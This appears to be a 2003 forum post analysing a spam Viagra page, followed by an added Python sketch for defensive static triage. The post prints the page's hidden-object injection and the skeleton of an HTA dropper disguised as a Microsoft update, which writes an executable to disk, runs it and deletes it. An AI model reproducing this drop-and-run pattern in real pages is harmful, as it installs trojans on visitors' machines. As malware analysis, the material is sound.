Date Posted: 23:12:32 11/03/03 Mon
Author: Scammer
Subject: Viagra or Trojan?

Viagra or Trojan? [well, if you get Viagra, I guess you would
be using Trojans ...]

Spamvertized URL: http://alldolly.net/discounts/?pid=evaph3770

(NANAS posting:
Subject: [email] V1@GRA --> 80% D1SC0UNT!! jjxcxuiz lqihjgkuf)

The site appears to be a Viagra site but the ordering is down now.
Was it ever up or is the site a fake Viagra site used to install
a trojan?


------------------------------------------------------------
There is a header section on the spamvertized page which is
mildly encrypted (decimal ASCII values for the characters)
which defines two functions:
DecodeHead() (which is immediately run) and
DecodeB() (run at the end of the page)

What do we get?

[object data="http://www.extreme-rapes.com/cgi-bin/htmlhelp.cgi"
style="display:none"][/object]

What is "http://www.extreme-rapes.com/cgi-bin/htmlhelp.cgi"?

Content-Type: application/hta

[TITLE]Microsoft Update Wizard[/TITLE]
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE

[OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"][/OBJECT]
[OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"][/OBJECT]
[BODY][SCRIPT language="VBScript"]

self.MoveTo 6000,6000

[Then 61 lines of hex encoded data.]

FileName="C:\netlog.exe"
set IESetup=MSmedia.CreateTextFile(FileName, TRUE)
[write the bytes of the code to the file:
IESetup.Write(Chr(Exe_Byte))]
MSplay.Run (FileName),1,TRUE
MSmedia.DeleteFile(FileName)
------------------------------------------------------------
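
Added example, not part of the original post: a static triage sketch in Python that decodes decimal character-code lists without running the page's script, then flags the two findings described above, a hidden object element and an HTA that instantiates file-write and process-launch COM classes. The comma-separated encoding, the function names and the sample data are assumptions; the class names are the standard registrations for the two CLSIDs quoted in the post.

```python
import re

# CLSIDs quoted in the post, mapped to the COM classes they are registered to.
RISKY_CLSIDS = {
    "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject",
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Shell",
}

# Assumption: the header stores character codes as a comma-separated decimal list.
DECIMAL_RUN = re.compile(r"\d{1,3}(?:\s*,\s*\d{1,3}){7,}")
HIDDEN_OBJECT = re.compile(
    r"<object\b(?=[^>]*\bdata\s*=\s*[\"']?([^\"'\s>]+))(?=[^>]*display\s*:\s*none)", re.I)
CLSID = re.compile(r"clsid:([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})", re.I)


def decode_decimal_runs(page):
    """Decode each decimal character-code list statically, without running script."""
    decoded = []
    for match in DECIMAL_RUN.finditer(page):
        codes = [int(n) for n in re.findall(r"\d+", match.group())]
        if all(c in (9, 10, 13) or 32 <= c < 127 for c in codes):
            decoded.append("".join(map(chr, codes)))
    return decoded


def triage_page(page):
    """Return data URLs of hidden <object> elements in the raw or decoded page."""
    urls = []
    for layer in [page] + decode_decimal_runs(page):
        urls += HIDDEN_OBJECT.findall(layer)
    return urls


def triage_hta(body):
    """Name the file-write and process-launch COM classes an HTA instantiates."""
    found = {c.upper() for c in CLSID.findall(body)}
    return sorted(RISKY_CLSIDS[c] for c in found if c in RISKY_CLSIDS)


# Constructed sample input; the URL is a placeholder, not the one from the post.
HIDDEN = '<object data="http://payload.example.invalid/x.cgi" style="display:none"></object>'
SAMPLE_PAGE = "<script>var h=[" + ",".join(str(ord(ch)) for ch in HIDDEN) + "];</script>"
SAMPLE_HTA = ('<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>'
              '<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>')

if __name__ == "__main__":
    print(triage_page(SAMPLE_PAGE))
    print(triage_hta(SAMPLE_HTA))
```

An HTA that pairs both classes can write a file and launch it, which is the CreateTextFile and Run sequence shown in the post, so the pair is a stronger signal than either class alone.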
